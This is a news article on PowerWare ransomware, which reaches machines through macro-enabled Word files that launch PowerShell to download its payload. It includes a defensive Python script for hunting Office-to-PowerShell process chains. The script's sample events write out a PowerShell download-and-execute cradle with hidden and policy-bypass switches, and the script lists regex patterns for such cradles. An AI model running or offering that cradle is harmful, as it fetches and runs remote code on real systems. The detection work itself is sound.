PowerWare ransomware uncovered, uses PowerShell for insertion

PowerWare embeds itself in the Windows operating system after being delivered via a phishing scam.

Cyber crooks once again found a way to use a Microsoft product to victimize the public.

The Carbon Black Research Team has discovered a new ransomware family, called PowerWare, that uses Microsoft Word and PowerShell, the scripting language and shell built into Windows. Instead of dropping a conventional malware executable onto the computer, PowerWare runs its payload through PowerShell so that the malicious activity blends in with the machine's legitimate administrative activity and is harder to detect, Carbon Black wrote.

“Our research found that PowerWare is delivered via a macro-enabled Microsoft Word document. The Word document then uses macros to spawn ‘cmd.exe,’ which in turn calls PowerShell with options that will download and run the malicious PowerWare code,” wrote Carbon Black researchers Rico Valdez and Mike Sconzo.
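The process chain the researchers describe (Word macro spawns cmd.exe, which launches PowerShell with download-and-run options) is exactly what a defender can hunt for in process-creation telemetry such as Sysmon Event ID 1 or EDR data. The following is an added example written for this article, not code from Carbon Black or from PowerWare itself: it walks parent/child links to find any PowerShell process descended from an Office application and scores its command line against download-cradle and stealth switches. The event shape, the sample events and the indicator regexes are assumptions for illustration; the article does not state which PowerShell options PowerWare actually used. The check generalizes slightly beyond the text by also catching Excel and PowerPoint parents and an Office process that launches PowerShell directly without cmd.exe in between.

```python
"""Hunt process-creation telemetry for Office -> (cmd.exe) -> PowerShell chains.

Event shape and sample data are constructed for this example: each event is a
dict with pid, ppid, image and cmdline, as a Sysmon/EDR feed would provide.
"""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}

# Download-cradle and stealth switches commonly seen in macro-launched
# PowerShell. Illustrative assumption, not PowerWare's exact options.
CRADLE_PATTERNS = {
    "downloadstring": r"downloadstring\(",
    "downloadfile": r"downloadfile\(",
    "webclient": r"net\.webclient",
    "invoke-expression": r"invoke-expression|\biex\b",
    "encoded": r"-enc(odedcommand)?\b",
    "hidden": r"-w(indowstyle)?\s+hidden",
    "bypass": r"-e(xecutionpolicy|p)\s+bypass",
    "noprofile": r"-nop(rofile)?\b",
}


@dataclass
class Finding:
    pid: int
    chain: list        # images from the Office ancestor down to PowerShell
    indicators: list   # cradle/stealth switch names found on the command line
    cmdline: str


def cradle_indicators(cmdline):
    """Return the names of CRADLE_PATTERNS that match the command line."""
    lc = cmdline.lower()
    return [name for name, pat in CRADLE_PATTERNS.items() if re.search(pat, lc)]


def _lineage(by_pid, pid, max_depth):
    """Walk ppid links upward; returns [image(pid), image(parent), ...]."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def find_office_powershell_chains(events, max_depth=5):
    """Flag every PowerShell process with an Office application among its ancestors."""
    by_pid = {e["pid"]: e for e in events}  # assumes no PID reuse in the window
    findings = []
    for ev in events:
        if ev["image"].lower() not in PS_IMAGES:
            continue
        lineage = _lineage(by_pid, ev["pid"], max_depth)
        office_idx = [i for i, img in enumerate(lineage) if img in OFFICE_IMAGES]
        if not office_idx:
            continue  # e.g. an admin opening PowerShell from Explorer
        chain = list(reversed(lineage[: office_idx[0] + 1]))
        findings.append(Finding(ev["pid"], chain, cradle_indicators(ev["cmdline"]), ev["cmdline"]))
    return findings


# Constructed sample: one macro-driven chain, one direct Office->PowerShell
# launch, and one benign interactive PowerShell session for contrast.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\a\\Downloads\\invoice.docm"'},
    {"pid": 300, "ppid": 200, "image": "cmd.exe",
     "cmdline": f'cmd.exe /c powershell.exe -nop -w hidden -ep bypass -c "{CRADLE}"'},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": f'powershell.exe -nop -w hidden -ep bypass -c "{CRADLE}"'},
    {"pid": 600, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -enc SQBFAFgA"},
    {"pid": 500, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -NoExit -Command Get-Service"},
]

if __name__ == "__main__":
    for f in find_office_powershell_chains(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {' -> '.join(f.chain)} indicators={f.indicators}")
```

In production the lineage walk should key on a process GUID rather than a raw PID, since PIDs are reused; the indicator list is a triage aid, and the parent chain alone (any Office application with a shell or PowerShell descendant) is the signal worth alerting on.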

Once PowerWare has run, the attackers demand a $500 ransom, which increases to $1,000 after two weeks.

The ransomware was discovered when Carbon Black investigated a healthcare customer that had been hit with an unsuccessful phishing campaign. Several healthcare providers have been hit with ransomware in the last few months.

“Ransomware authors are always trying to evolve to avoid detection, and using built-in Windows capabilities makes the malicious activity less noticeable,” said Tim Erlin, Tripwire's director of IT security and risk strategy. “This ransomware may change its encryption technique, but it still requires an entry point onto the system.”

Malicious Word files sent through email and the use of Microsoft Office macros are a tried-and-true vector for this new malware, he added.
